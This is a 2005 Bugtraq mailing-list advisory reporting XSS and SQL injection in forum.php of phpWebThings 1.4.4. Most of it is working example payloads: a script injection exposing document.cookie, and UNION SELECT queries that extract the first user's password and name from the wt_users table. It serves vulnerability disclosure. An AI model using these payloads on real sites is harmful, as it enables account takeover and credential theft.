[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: XSS & SQL injection in phpWebThing
From: xx_hack_xx_2004 () hotmail ! com
Date: 2005-11-05 3:00:11
Message-ID: 20051105030011.9445.qmail () securityfocus ! com
[Download RAW message or body]
Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org
The bug reside in : forum.php
Exploit :
http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]
Example :
XSS
http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>
SQL
For Passowrd
http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null \
from wt_users where uid=1/*
For Name
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from \
wt_users where uid=1/*
Discovery by Linux_Drox
http://www.lezr.com
Best Regards
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic